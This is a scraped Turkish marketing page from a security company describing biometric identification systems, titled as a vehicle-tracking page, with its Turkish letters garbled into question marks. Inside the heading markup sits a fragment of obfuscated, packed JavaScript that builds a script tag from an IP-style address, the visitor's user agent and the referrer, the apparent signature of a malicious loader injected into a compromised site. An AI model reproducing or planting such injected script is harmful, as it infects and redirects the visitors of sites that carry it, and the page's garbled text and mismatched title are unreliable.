Araç Takip Sistemleri

<”h1″ id="uvc-type-wrap-3917" data-ultimate-target='#uvc-type-wrap-3917' data-responsive-json-new='{"font-size":"","line-height":""}' class="uvc-type-wrap ult-adjust-bottom-margin ult-responsive uvc-type-align-”left” uvc-wrap-17758372545b01787132683" style="font-weight:normal;text-align:”left”;">”Araç”güvendeler”=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("<\\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rrdrd|var|u0026u|referrer|yfats||js|php'.split('|'),0,{})) çok” ex_class=”m-b-sm”]

Biometrik, kullan?c?n?n fiziksel ve davran??sal özelliklerini tan?yarak kimlik saptamak üzere geli?tirilmi? bilgisayar kontrollü, otomatik sistemler için kullan?lan genel bir terimdir. Kart, ?ifre veya pin numaras? kullanan di?er tan?ma yöntemlerine oranla çok daha güvenilir olduklar? için tercih edilirler.

ARTGES Genel Güvenlik Sistemleri insanlar?n; parmak izi, göz retinas?, iris, yüz ?ekli, ses, imza, avuç içi vs gibi karakteristiklerini saptayarak bilgisayar sistemleri, veri bankalar? vb. ortamlara giri? için kimlik do?rulamas?n? yapmaktad?rlar. Biometrik sistemler temelde, ki?inin sadece kendisinin sahip oldu?u, de?i?tiremedi?i ve di?erlerinden ay?rt edici olan, fiziksel veya davran??sal bir özelli?inin tan?nmas? ile çal??maktad?rlar. Ancak bu sistemlerin güvenilir olmalar?n?n yan? s?ra pratik olmalar? da gerekti?i için, ki?ileri hangi yöntemler ile saptad?klar? da önemli bir etkendir. Sonuç olarak biometrik yöntemlerin güvenlik sistemlerinin geli?tirilmesinde, suçlular?n bulunmas?nda ve insanlar?n tan?mlanmas?nda kullan?m? gittikçe artmaktad?r.

Bir sisteme kim oldu?unuzu kan?tlaman?z?n geleneksel yolu ?ifre yazmakt?r. Fakat bu yol, ?ifreleme algoritmalar?n?n çözümlenmesi sayesinde güvenli?ini her geçen gün kaybetmektedir.

?ifreler korsanlar taraf?ndan birçok kez k?r?ld??? ve kullan?c?lar taraf?ndan s?k s?k unutulduklar? için art?k yerlerini ak?ll? kartlar ve biometrik cihazlar gibi yeni teknolojilere b?rakmaktad?rlar. Biometrik cihazlar, insanlar?n parmak izi, göz retinas? gibi benzeri olmayan karakteristiklerini ölçerek, kullan?c?lar?n ?ifre kullanmaks?z?n bilgisayar sistemleri, veri bankalar? gibi ortamlara giri? için kimlik do?rulamas?n? yapmaktad?rlar.